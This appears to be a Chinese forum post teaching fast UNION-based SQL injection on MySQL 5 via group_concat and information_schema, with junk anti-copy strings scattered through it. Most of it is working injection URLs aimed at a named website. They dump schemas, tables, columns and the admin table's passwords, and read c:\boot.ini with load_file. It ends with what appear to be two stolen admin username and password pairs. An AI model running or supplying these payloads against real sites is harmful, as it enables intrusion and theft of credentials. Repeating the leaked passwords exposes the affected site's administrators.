此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
. l8 v/ W& @; ?! i/ L* K但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人/ n( ~$ D d' ]; X2 w2 D
0 |* U" K) `1 N- S/ s7 R7 L
$ V V( t! f# }% O$ ?
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
. X: H: q( d4 n# b9 Q0 e; g* y
5 e( h% N& a) l; S5 h' { [缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
, @4 w, c4 D( o/ e0 g9 j2 G
# s/ d7 |5 Q5 ~% F! D9 | j下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
3 _; G" O6 r/ o" |- v: U在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等% s* F9 P7 I% C1 L$ Q
2 A1 \0 D5 [1 r+ K
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17- `& I \- n( I+ U9 W' Y
; d2 m. ~* F% s4 a! H2 M4 |读出所有库:
" @" D0 w5 S3 q+ E. m8 ~8 i/ ohttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
+ p% z! F }) P7 ?1 N8 O+ g: Y( G4 b
. W9 [: s1 @: z# L. P" h# Z
: P4 H5 M2 H! ~" p读出所有表:' ?/ B5 w5 ^9 S$ Z# O4 `8 y, v
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
; k9 @8 W. u# e# j% A0 O: i5 F; o( e+ W1 S N
读出所有表字段:
; o1 E, I7 `+ e) [5 b/ @8 D1 d7 khttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
( @ V% u& e1 t& J- [! f, @7 I4 h*/ (97,100,109,105,110)为admin的ascii码 依次类推) ` x# z) U+ K: m/ ?$ m% B
3 P* k1 H5 R! C- a" Q5 F3 \读出所有表字段里的内容:( x ~5 D+ `) Z
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin# {% ^$ _6 s) ^6 z8 n8 r3 A
' r- V5 d+ h! E+ C7 c- z' n3 a( @8 o
/ c3 T) P2 u: L1 x
+ m. F: ^" V" N0 u |5 n4 \. D& j( f! u! Z3 F$ |) h$ i& I
2 S' C- ^6 d. [$ H; S+ Z
! f, h9 j t d7 ]. {; I8 @http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
: S, F8 Z2 K" ^5 I4 f! a
) J* P5 h y3 l, a. A# S$ b/ f: u6 }
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
' {, d/ d; z( K& _, I
. Q2 q. {) F q1 h. }5 yhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23/ s5 k- H; c8 R0 q) ^0 ~8 j
/ ~( L% {$ f* X8 k, J& A3 w+ e4 e! L$ G# n. b
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%236 o1 i1 G( Z1 U: L" p8 W7 `* h
' G0 Z* U& h. T/ ?
, e& |3 M p, [0 _5 i/ i# k0 d
webmaster:dzb521123,simlab:simadmin20043233# I& U8 v7 d6 K4 a+ G7 U
|